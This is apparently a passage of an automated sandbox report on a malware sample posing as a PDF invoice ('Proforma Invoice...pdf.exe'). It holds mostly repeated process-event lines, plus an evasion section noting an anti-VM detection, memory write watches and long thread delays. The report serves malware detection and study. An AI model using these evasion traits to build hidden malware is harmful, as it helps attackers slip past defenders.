                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Proforma Invoice_21-1541 And Packing List.pdf.exe PID: 7576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vrhZELiHpiub.exe PID: 8164, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 4790000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 8AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 7580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 9AC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: AAC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeMemory allocated: 27B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 810000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 82C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 6860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 92C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: A2C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 1110000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 2B30000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\vrhZELiHpiub.exeMemory allocated: 1190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599780Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 599093Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exeThread delayed: delay time: 598422Jump to behavior
